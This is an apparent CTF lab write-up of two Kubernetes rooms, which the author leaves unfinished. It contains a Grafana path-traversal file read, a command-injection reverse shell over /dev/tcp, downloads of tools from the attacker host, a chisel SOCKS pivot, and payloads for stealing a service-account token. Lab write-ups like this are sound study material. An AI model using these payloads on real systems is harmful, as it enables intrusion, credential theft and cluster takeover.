K8s Target Machine

Kubernetes for Everyone

Task1: Access the Cluster

To access a cluster, you need to know the location of the K8s cluster and have credentials to access it. Compromise the cluster and best of luck.Use Nmap to find open ports and gain a foothold by exploiting a vulnerable service. If you are new at Nmap, take a look at the Nmap room.

Task2: Your Secret Crush

If you want to keep a secret, you must also hide it from yourself. Find the secret!

Scan IP with fscan or nmap

┌──(root㉿kali)-[/home/kali]
└─# nmap 10.10.239.222  
Starting Nmap 7.93 ( https://nmap.org ) at 2023-12-06 08:57 EST
Nmap scan report for bogon (10.10.239.222)
Host is up (0.28s latency).
Not shown: 996 closed tcp ports (reset)
PORT     STATE SERVICE
22/tcp   open  ssh
111/tcp  open  rpcbind
3000/tcp open  ppp
5000/tcp open  upnp

Nmap done: 1 IP address (1 host up) scanned in 3.06 seconds

Port 3000 is the Grafana application. version 8.3.0 with Arbitrary file read vulnerability

the network is so slow.

GET /public/plugins/gettingstarted/../../../../../../../../../../../../../../../etc/passwd HTTP/1.1
Host: 10.10.239.222:3000
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.5249.62 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: redirect_to=%2F
Connection: close

HTTP/1.1 200 OK
Accept-Ranges: bytes
Cache-Control: no-cache
Content-Length: 1231
Content-Type: text/plain; charset=utf-8
Expires: -1
Last-Modified: Tue, 08 Feb 2022 11:40:05 GMT
Pragma: no-cache
X-Content-Type-Options: nosniff
X-Frame-Options: deny
X-Xss-Protection: 1; mode=block
Date: Wed, 06 Dec 2023 15:06:17 GMT
Connection: close

root:x:0:0:root:/root:/bin/ash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/mail:/sbin/nologin
news:x:9:13:news:/usr/lib/news:/sbin/nologin
uucp:x:10:14:uucp:/var/spool/uucppublic:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
man:x:13:15:man:/usr/man:/sbin/nologin
postmaster:x:14:12:postmaster:/var/mail:/sbin/nologin
cron:x:16:16:cron:/var/spool/cron:/sbin/nologin
ftp:x:21:21::/var/lib/ftp:/sbin/nologin
sshd:x:22:22:sshd:/dev/null:/sbin/nologin
at:x:25:25:at:/var/spool/cron/atjobs:/sbin/nologin
squid:x:31:31:Squid:/var/cache/squid:/sbin/nologin
xfs:x:33:33:X Font Server:/etc/X11/fs:/sbin/nologin
games:x:35:35:games:/usr/games:/sbin/nologin
cyrus:x:85:12::/usr/cyrus:/sbin/nologin
vpopmail:x:89:89::/var/vpopmail:/sbin/nologin
ntp:x:123:123:NTP:/var/empty:/sbin/nologin
smmsp:x:209:209:smmsp:/var/spool/mqueue:/sbin/nologin
guest:x:405:100:guest:/dev/null:/sbin/nologin
nobody:x:65534:65534:nobody:/:/sbin/nologin
grafana:x:472:0:hereiamatctf907:/home/grafana:/sbin/nologin

then, Port 5000, find the account in the static file /static/css/main.css

visit this url, we get OZQWO4TBNZ2A====

1 2	/* @import url("https://pastebin.com/cPs69B0y"); */ OZQWO4TBNZ2A====

1	vagrant/hereiamatctf907

vagrant@johnny:/$ ps aux
USER       PID %CPU %MEM    VSZ   RSS TTY      STAT START   TIME COMMAND                                                                                 
root         1  0.6  0.1 225276   572 ?        Ss   13:35   0:43 /sbin/init                                                                              
root         2  0.0  0.0      0     0 ?        S    13:35   0:00 [kthreadd]                                                                              
root         4  0.0  0.0      0     0 ?        I<   13:35   0:00 [kworker/0:0H]                                                                          
root         5  0.0  0.0      0     0 ?        I    13:35   0:02 [kworker/u30:0]                                                                         
root         6  0.0  0.0      0     0 ?        I<   13:35   0:00 [mm_percpu_wq]                                                                          
root         7  0.0  0.0      0     0 ?        S    13:35   0:05 [ksoftirqd/0]                                                                           
root         8  0.0  0.0      0     0 ?        I    13:35   0:05 [rcu_sched]                                                                             
root         9  0.0  0.0      0     0 ?        I    13:35   0:00 [rcu_bh]                                                                                
root        10  0.0  0.0      0     0 ?        S    13:35   0:00 [migration/0]                                                                           
root        11  0.0  0.0      0     0 ?        S    13:35   0:00 [watchdog/0]                                                                            
root        12  0.0  0.0      0     0 ?        S    13:35   0:00 [cpuhp/0]                                                                               
root        13  0.0  0.0      0     0 ?        S    13:35   0:00 [kdevtmpfs]                                                                             
root        14  0.0  0.0      0     0 ?        I<   13:35   0:00 [netns]                                                                                 
root        15  0.0  0.0      0     0 ?        S    13:35   0:00 [rcu_tasks_kthre]                                                                       
root        16  0.0  0.0      0     0 ?        S    13:35   0:00 [kauditd]                                                                               
root        17  0.0  0.0      0     0 ?        S    13:35   0:00 [xenbus]                                                                                
root        18  0.0  0.0      0     0 ?        S    13:35   0:00 [xenwatch]                                                                              
root        19  0.0  0.0      0     0 ?        I    13:35   0:00 [kworker/0:1]                                                                           
root        20  0.0  0.0      0     0 ?        S    13:35   0:00 [khungtaskd]                                                                            
root        21  0.0  0.0      0     0 ?        S    13:35   0:00 [oom_reaper]                                                                            
root        22  0.0  0.0      0     0 ?        I<   13:35   0:00 [writeback]                                                                             
root        23  0.0  0.0      0     0 ?        S    13:35   0:00 [kcompactd0]                                                                            
root        24  0.0  0.0      0     0 ?        SN   13:35   0:00 [ksmd]                                                                                  
root        25  0.0  0.0      0     0 ?        I<   13:35   0:00 [crypto]                                                                                
root        26  0.0  0.0      0     0 ?        I<   13:35   0:00 [kintegrityd]                                                                           
root        27  0.0  0.0      0     0 ?        I<   13:35   0:00 [kblockd]                                                                               
root        28  0.0  0.0      0     0 ?        I<   13:35   0:00 [ata_sff]                                                                               
root        29  0.0  0.0      0     0 ?        I<   13:35   0:00 [md]                                                                                    
root        30  0.0  0.0      0     0 ?        I<   13:35   0:00 [edac-poller]                                                                           
root        31  0.0  0.0      0     0 ?        I<   13:35   0:00 [devfreq_wq]                                                                            
root        32  0.0  0.0      0     0 ?        I<   13:35   0:00 [watchdogd]                                                                             
root        35 18.3  0.0      0     0 ?        R    13:35  19:20 [kswapd0]
root        36  0.0  0.0      0     0 ?        I<   13:35   0:00 [kworker/u31:0]
root        37  0.0  0.0      0     0 ?        S    13:35   0:00 [ecryptfs-kthrea]
root        79  0.0  0.0      0     0 ?        I<   13:35   0:00 [kthrotld]
root        80  0.0  0.0      0     0 ?        I<   13:35   0:00 [acpi_thermal_pm]
root        81  0.0  0.0      0     0 ?        S    13:35   0:00 [scsi_eh_0]
root        82  0.0  0.0      0     0 ?        I<   13:35   0:00 [scsi_tmf_0]
root        83  0.0  0.0      0     0 ?        S    13:35   0:00 [scsi_eh_1]
root        84  0.0  0.0      0     0 ?        I<   13:35   0:00 [scsi_tmf_1]
root        85  0.0  0.0      0     0 ?        R    13:35   0:01 [kworker/u30:2]
root        90  0.0  0.0      0     0 ?        I<   13:35   0:00 [ipv6_addrconf]
root        96  0.0  0.0      0     0 ?        I    13:35   0:03 [kworker/u30:4]
root       100  0.0  0.0      0     0 ?        I<   13:35   0:00 [kstrp]
root       114  1.2  0.0      0     0 ?        I<   13:35   1:22 [kworker/0:1H]
root       118  0.0  0.0      0     0 ?        I<   13:35   0:00 [charger_manager]
root       174  0.0  0.0      0     0 ?        I<   13:35   0:00 [ttm_swap]
root       263  0.0  0.0      0     0 ?        I<   13:35   0:00 [raid5wq]
root       289  0.0  0.0      0     0 ?        I<   13:35   0:00 [kdmflush]
root       290  0.0  0.0      0     0 ?        I<   13:35   0:00 [bioset]
root       298  0.0  0.0      0     0 ?        I<   13:35   0:00 [kdmflush]
root       299  0.0  0.0      0     0 ?        I<   13:35   0:00 [bioset]
root       346  0.0  0.0      0     0 ?        S    13:35   0:02 [jbd2/dm-0-8]
root       347  0.0  0.0      0     0 ?        I<   13:35   0:00 [ext4-rsv-conver]
root       404  2.0  0.1 111188   624 ?        R<s  13:35   2:11 /lib/systemd/systemd-journald
root       413  0.0  0.0      0     0 ?        I<   13:35   0:00 [iscsi_eh]
root       415  0.0  0.0      0     0 ?        I<   13:35   0:00 [rpciod]
root       416  0.0  0.0      0     0 ?        I<   13:35   0:00 [xprtiod]
root       417  0.0  0.0 105904     0 ?        Ss   13:35   0:00 /sbin/lvmetad -f
root       418  0.1  0.0  45980    76 ?        Ss   13:35   0:08 /lib/systemd/systemd-udevd
root       421  0.0  0.0      0     0 ?        I<   13:35   0:00 [ib-comp-wq]
root       422  0.0  0.0      0     0 ?        I<   13:35   0:00 [ib_mcast]
root       423  0.0  0.0      0     0 ?        I<   13:35   0:00 [ib_nl_sa_wq]
root       424  0.0  0.0      0     0 ?        I<   13:35   0:00 [rdma_cm]
systemd+   455  0.0  0.0  80168   124 ?        Ss   13:36   0:02 /lib/systemd/systemd-networkd
systemd+   497  0.0  0.0  70628    84 ?        Ss   13:36   0:01 /lib/systemd/systemd-resolved
root       498  0.0  0.0  47600    68 ?        Ss   13:36   0:00 /sbin/rpcbind -f -w
root       623  0.0  0.0  95540     0 ?        Ssl  13:36   0:00 /usr/bin/lxcfs /var/lib/lxcfs/
message+   624  0.0  0.0  50104   328 ?        Ss   13:36   0:01 /usr/bin/dbus-daemon --system --address=systemd: --nofork --nopidfile --systemd-activati
syslog     635  0.2  0.0 267272    96 ?        Ssl  13:36   0:15 /usr/sbin/rsyslogd -n
daemon     645  0.0  0.0  28332    32 ?        Ss   13:36   0:00 /usr/sbin/atd -f
root       646  0.0  0.1  70604   688 ?        Ss   13:36   0:01 /lib/systemd/systemd-logind
root       648  0.9  0.7 1232940 3568 ?        Ssl  13:36   0:59 /usr/bin/amazon-ssm-agent
root       650  0.0  0.0 170440    56 ?        Ssl  13:36   0:01 /usr/bin/python3 /usr/bin/networkd-dispatcher --run-startup-triggers
root       651  0.0  0.0  31320   376 ?        Ss   13:36   0:01 /usr/sbin/cron -f
root       653  0.0  0.0 287536    72 ?        Ssl  13:36   0:05 /usr/lib/accountsservice/accounts-daemon
root       679  1.7  0.7 1277280 3844 ?        Ssl  13:36   1:49 /usr/bin/containerd
root       684  0.0  0.0  15956    28 ttyS0    Ss+  13:36   0:00 /sbin/agetty -o -p -- \u --keep-baud 115200,38400,9600 ttyS0 vt220
root       686  0.0  0.0  16180    20 tty1     Ss+  13:36   0:00 /sbin/agetty -o -p -- \u --noclear tty1 linux
root       704  0.0  0.0  72296     0 ?        Ss   13:36   0:00 /usr/sbin/sshd -D
root       708  0.0  0.0 291456   340 ?        Ssl  13:36   0:00 /usr/lib/policykit-1/polkitd --no-debug
root       753  0.9  0.7 1170504 3680 ?        Sl   13:36   1:00 /usr/bin/ssm-agent-worker
root       776  2.4  0.2 1447128 1216 ?        Ssl  13:36   2:32 /usr/bin/dockerd -H fd:// --containerd=/run/containerd/containerd.sock
root      1005  0.0  0.0 1005440    0 ?        Sl   13:37   0:01 /usr/bin/docker-proxy -proto tcp -host-ip 0.0.0.0 -host-port 3000 -container-ip 172.17.0
root      1011  0.0  0.0 1005440   24 ?        Sl   13:37   0:01 /usr/bin/docker-proxy -proto tcp -host-ip :: -host-port 3000 -container-ip 172.17.0.2 -c
root      1024  0.0  0.0 1005440    0 ?        Sl   13:37   0:01 /usr/bin/docker-proxy -proto tcp -host-ip 0.0.0.0 -host-port 5000 -container-ip 172.17.0
root      1028  0.0  0.0 1005440    0 ?        Sl   13:37   0:00 /usr/bin/docker-proxy -proto tcp -host-ip :: -host-port 5000 -container-ip 172.17.0.3 -c
root      1107  0.3  0.3 712596  1676 ?        Sl   13:37   0:21 /usr/bin/containerd-shim-runc-v2 -namespace moby -id e7c06a854957fdc4f49e721a5e295c7acd2
root      1121  0.2  0.3 712852  1792 ?        Sl   13:37   0:16 /usr/bin/containerd-shim-runc-v2 -namespace moby -id 54c2fca370f68b4fdb5d163e8835286c19c
vagrant   1158  0.3  0.0  28532    48 pts/0    Ss+  13:37   0:20 python3 main.py
472       1161  6.6  1.4 786624  7316 pts/0    Ssl+ 13:37   6:49 grafana-server --homepath=/usr/share/grafana --config=/etc/grafana/grafana.ini --packagi
vagrant   1291 20.7  0.9  29744  4884 pts/0    Dl+  13:39  21:03 /usr/local/bin/python3 /home/pyuser/main.py
kube-ap+  1298  0.9  1.5 725628  7484 ?        Sl   13:39   0:58 /var/lib/k0s/bin/kine --endpoint=sqlite:///var/lib/k0s/db/state.db?more=rwc&_journal=WAL
root      1330  0.0  0.0      0     0 ?        I    13:41   0:05 [kworker/0:0]
root      1355  5.4  3.9 787240 19468 ?        Ssl  13:44   5:16 /usr/local/bin/k0s controller --single=true
kube-ap+  1363  3.7  4.0 728096 19828 ?        Sl   13:45   3:36 /var/lib/k0s/bin/kine --endpoint=sqlite:///var/lib/k0s/db/state.db?more=rwc&_journal=WAL
kube-ap+  1372  8.4 42.8 985868 210572 ?       Sl   13:45   8:05 /var/lib/k0s/bin/kube-apiserver --requestheader-username-headers=X-Remote-User --anonymo
kube-sc+  1411  4.8  2.4 753784 12132 ?        Sl   13:45   4:36 /var/lib/k0s/bin/kube-scheduler --authorization-kubeconfig=/var/lib/k0s/pki/scheduler.co
kube-ap+  1626  6.9  2.7 766848 13716 ?        Rl   15:14   0:28 /var/lib/k0s/bin/kube-controller-manager --authentication-kubeconfig=/var/lib/k0s/pki/cc
vagrant   1636  0.3  0.0  76772     0 ?        Ss   15:15   0:01 /lib/systemd/systemd --user
vagrant   1643  0.0  0.0 259260     8 ?        S    15:15   0:00 (sd-pam)
root      1690 11.0  6.3 175760 31236 ?        D    15:15   0:33 /usr/bin/python3 /usr/lib/ubuntu-release-upgrader/check-new-release -q
root      1754  0.6  0.1 105684   536 ?        Ss   15:17   0:01 sshd: vagrant [priv]
vagrant   1819  0.1  0.0 107984   160 ?        S    15:19   0:00 sshd: vagrant@pts/0
vagrant   1820  0.4  0.2  21472  1108 pts/0    Ss   15:19   0:00 -bash
vagrant   1835  9.0  0.6  39664  3260 pts/0    R+   15:20   0:00 ps aux

K0s(k8s lightweight version), kine(etcd), and docker

The method was adopted to drag the etcd database to the local and then analyze it. And the data in etcd is not encrypted in the default configuration.

the databse path is /var/lib/k0s/db/state.db

………….write later….go to sleep…….

Insekube

Task1: Introduction

The learning objectives for this room are:

Interacting with the cluster using kubectl
Reading Kubernetes secrets
Doing recon inside the cluster
Switching service accounts to escalate your privileges
Lateral movement into other workloads
Gaining access to the Kubernetes nodes

We assume basic knowledge of the Kubernetes architecture and some experience running Kubernetes administration tools like kubectl.

Disclaimer: Due to this room running on a VM it uses minikube which is not exactly the same as running a fully fledged Kubernetes cluster so you might experience some minor differences with a real cluster.

This machine can take a while to boot up (Give it 5 or 6 minutes)

Scan the machine. (If you are unsure how to tackle this, I recommend checking out the Nmap room)

Task2: RCE

Visit the website, it takes a host and returns the output of a ping command.

Use command injection to get a reverse shell. For more information on command injection attacks take a look at this room

You will find the flag in an environment variable.

Task3: Interacting with kubernetes

Kubernetes exposes an HTTP API to control the cluster. All resources in the cluster can be accessed and modified through this API. The easiest way to interact with the API is to use the kubectl CLI. You could also interact with the API directly using curl or wget if you don’t have write access and kubectl is not already present, Here is a good article on that.

The kubectl install instructions can be found here. However, the binary is located in the /tmp directory. In the event you run into a scenario where the binary is not available, it’s as simple as downloading the binary to your machine and serving it (with a python HTTP server for example) so it is accessible from the container.

Now let’s move to the /tmp directory where the kubectl is conveniently located for you and try the kubectl get pods command. You’ll notice a forbidden error which means the service account running this pod does not have enough permissions.

Task4: Kubernetes Secrets

Kubernetes stores secret values in resources called Secrets these then get mounted into pods either as environment variables or files.

You can use kubectl to list and get secrets. The content of the secret is stored base64 encoded.

You will find flag 2 in a Kubernetes secret.

Task5: Recon in the cluster

Some interesting Kubernetes objects to look for would be nodes, deployments, services, ingress, jobs… But the service account you control does not have access to any of them.

However, by default Kubernetes creates environment variables containing the host and port of the other services running in the cluster.

Running env you will see there is a Grafana service running in the cluster.

Task6: Lateral Movement

Kubernetes stores the token of the service account running a pod in /var/run/secrets/kubernetes.io/serviceaccount/token.

Use the LFI vulnerability to extract the token. The token is a JWT signed by the cluster.

Use the --token flag in kubectl to use the new service account. Once again use kubectl to check the permissions of this account.

Task7: Escape to the node

You can now close the Grafana pod shell and continue using the first one since it is more stable.

Having admin access to the cluster you can create any resources you want. This article explains how to get access to the Kubernetes nodes by running a pod that mounts the node’s file system.

You can create a “bad” pod based on their first case example. You will need a slight modification because the VM does not have an internet connection, therefore it is not able to pull the ubuntu container image. The image is available in minikube’s local docker registry therefore you just need to tell Kubernetes to use the local version instead of pulling it. You can achieve this by adding imagePullPolicy: IfNotPresent to your “bad” pod container. Once that is done you can run kubectl apply to create the pod. Then kubectl exec into the new pod, you will find the node’s file system mounted on /host.

ports 80,22 are open

visit url 10.10.167.47:80, as shown below

the network speed is too slow, we try curl access.

┌──(root㉿kali)-[/home/kali/Desktop]
└─# curl http://10.10.167.47/?hostname=%3Buname+-a 
<!DOCTYPE html>

<head>
    <link rel="stylesheet" href="https://stackpath.bootstrapcdn.com/bootstrap/4.5.2/css/bootstrap.min.css"
        integrity="sha384-JcKb8q3iqJ61gNV9KGb8thSsNjpSL0n8PARn9HuZOnIxN0hoP+VmmDGMN5t9UJ0Z" crossorigin="anonymous">
    <style>
        body,
        html {
            height: 100%;
        }
    </style>
</head>

<body>
    <div class="container h-100">
        <div class="row mt-5">
            <div class="col-12 mb-4">
                <h3 class="text-center">Check if a website is down 💣</h3>
            </div>
            <form class="col-6 mx-auto" action="/">
                <div class=" input-group">
                    <input name="hostname" value=";uname -a" type="text" class="form-control" placeholder="Hostname"
                        aria-label="Hostname" aria-describedby="basic-addon2" required>
                    <div class="input-group-append">
                        <button class="btn btn-outline-secondary" type="submit">Check</button>
                    </div>
                </div>
            </form>
            <div class="col-9 mt-4 mx-auto">
                <pre>ping: usage error: Destination address required
Linux syringe-79b66d66d7-6xdjz 5.4.0-92-generic #103-Ubuntu SMP Fri Nov 26 16:13:00 UTC 2021 x86_64 x86_64 x86_64 GNU/Linux
</pre>
            </div>
        </div>
    </div>
</body>

</html>

then rebound shell

1	curl http://10.10.167.47/?hostname=%3Bbash%20%2Di%20%3E%26%20%2Fdev%2Ftcp%2F10%2E9%2E155%2E83%2F7779%200%3E%261

challenge@syringe-79b66d66d7-6xdjz:/tmp$ env
env
KUBERNETES_SERVICE_PORT_HTTPS=443
GRAFANA_SERVICE_HOST=10.105.120.1
KUBERNETES_SERVICE_PORT=443
HOSTNAME=syringe-79b66d66d7-6xdjz
SYRINGE_PORT=tcp://10.103.9.166:3000
GRAFANA_PORT=tcp://10.105.120.1:3000
SYRINGE_SERVICE_HOST=10.103.9.166
SYRINGE_PORT_3000_TCP=tcp://10.103.9.166:3000
GRAFANA_PORT_3000_TCP=tcp://10.105.120.1:3000
PWD=/tmp
SYRINGE_PORT_3000_TCP_PROTO=tcp
HOME=/home/challenge
KUBERNETES_PORT_443_TCP=tcp://10.96.0.1:443
LS_COLORS=
GOLANG_VERSION=1.15.7
FLAG=flag{5e7cc6165f6c2058b11710a26691bb6b}
SHLVL=2
SYRINGE_PORT_3000_TCP_PORT=3000
GRAFANA_PORT_3000_TCP_PORT=3000
KUBERNETES_PORT_443_TCP_PROTO=tcp
KUBERNETES_PORT_443_TCP_ADDR=10.96.0.1
GRAFANA_SERVICE_PORT=3000
SYRINGE_PORT_3000_TCP_ADDR=10.103.9.166
SYRINGE_SERVICE_PORT=3000
KUBERNETES_SERVICE_HOST=10.96.0.1
KUBERNETES_PORT=tcp://10.96.0.1:443
KUBERNETES_PORT_443_TCP_PORT=443
GRAFANA_PORT_3000_TCP_PROTO=tcp
PATH=/usr/local/go/bin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
OLDPWD=/home/challenge
GRAFANA_PORT_3000_TCP_ADDR=10.105.120.1
_=/usr/bin/env

through env command, we get the first flag, but it is for task2.

1	curl -o /tmp/kubectl http://10.9.155.83:8080/kubectl

challenge@syringe-79b66d66d7-6xdjz:/tmp$ curl -o /tmp/kubectl http://10.9.155.83:8080/kubectl
<url -o /tmp/kubectl http://10.9.155.83:8080/kubectl
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
  0     0    0     0    0     0      0      0 --:--:-- --:--:-- --:--  0 47.5M    0 89320    0     0    99k      0  0:08:08 --:--:--  0:08  1 47.5M    1  879k    0     0   474k      0  0:01:42  0:00:01  0:01  3 47.5M    3 1548k    0     0   553k      0  0:01:28  0:00:02  0:01  4 47.5M    4 1976k    0     0   519k      0  0:01:33  0:00:03  0:01  5 47.5M    5 2520k    0     0   520k      0  0:01:33  0:00:04  0:01  6 47.5M    6 3074k    0     0   528k      0  0:01:32  0:00:05  0:01  7 47.5M    7 3628k    0     0   533k      0  0:01:31  0:00:06  0:01  8 47.5M    8 4102k    0     0   524k      0  0:01:32  0:00:07  0:01  9 47.5M    9 4696k    0     0   530k      0  0:01:31  0:00:08  0:01 11 47.5M   11 5388k    0     0   543k      0  0:01:29  0:00:09  0:01 11 47.5M   11 5830k    0     0   537k      0  0:01:30  0:00:10  0:01 13 47.5M   13 6468k    0     0   546k      0  0:01:29  0:00:11  0:01 14 47.5M   14 7160k    0     0   558k      0  0:01:27  0:00:12  0:01100 47.5M  100 47.5M    0     0   567k      0  0:01:25  0:01:25 --:--:--  883k
challenge@syringe-79b66d66d7-6xdjz:/tmp$ ls
ls
kubectl
challenge@syringe-79b66d66d7-6xdjz:/tmp$ ll
ll
total 48724
drwxrwxrwt 1 root      root          4096 Dec 13 16:27 ./
drwxr-xr-x 1 root      root          4096 Dec 13 16:22 ../
-rw-r--r-- 1 challenge challenge 49885184 Dec 13 16:28 kubectl
challenge@syringe-79b66d66d7-6xdjz:/tmp$ chmod +x kubectl
chmod +x kubectl
challenge@syringe-79b66d66d7-6xdjz:/tmp$ ll
ll
total 48724
drwxrwxrwt 1 root      root          4096 Dec 13 16:27 ./
drwxr-xr-x 1 root      root          4096 Dec 13 16:22 ../
-rwxr-xr-x 1 challenge challenge 49885184 Dec 13 16:28 kubectl*
challenge@syringe-79b66d66d7-6xdjz:/tmp$

./kubectl get pods command error

check the permission of the current account

1	./kubectl auth can-i --list

view secrets to get the second flag

1 2	./kubectl get secrets ./kubectl get secrets secretflag -o json

ZmxhZ3tkZjJhNjM2ZGUxNTEwOGE0ZGM0MTEzNWQ5MzBkOGVjMX0=

the environment variable leaked the Grafana address, version 8.3.0-beta2 (8d74cc357). Set up a proxy and use exp to read the serviceaccount token, 10.105.120.1

1
2
3

cd /home/kali/Desktop && python3 -m http.server 8080
./chisel server -p 28190 --reverse

curl -o /tmp/chisel http://10.9.155.83:8080/chisel
cd /tmp && chmod +x chisel
./chisel client 10.9.155.83:28190 R:0.0.0.0:28191:socks
vim /etc/proxychains4.conf
proxychains4 -f /etc/proxychains4.conf python3

proxychains4 -f /etc/proxychains4.conf firefox
proxychains4 -f /etc/proxychains4.conf burpsuite

proxychains4 -f /etc/proxychains4.conf curl http://10.105.120.1:3000/public/plugins/alertlist/../../../../../../../../etc/passwd --cookie "grafana_session=749c76365cf448fb8ddfd1b78af3881e"

proxychains4 -f /etc/proxychains4.conf curl http://10.105.120.1:3000/public/plugins/alertlist/../../../../../../../../etc/passwd --cookie "redirect_to=%2F;grafana_session=749c76365cf448fb8ddfd1b78af3881e"

proxychains4 -f /etc/proxychains4.conf curl http://10.105.120.1:3000/public/plugins/gettingstarted/../../../../../../../../../../../../../../../etc/passwd

proxychains4 -f /etc/proxychains4.conf curl http://10.105.120.1:3000/public/plugins/alertlist/../../../../../../../../var/run/secrets/kubernetes.io/serviceaccount/token

proxychains4 -f /etc/proxychains4.conf curl http://10.105.120.1:3000/public%2Fplugins%2Falertlist%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2Fvar%2Frun%2Fsecrets%2Fkubernetes%2Eio%2Fserviceaccount%2Ftoken

it’s 1:40 am, but fail.sleep!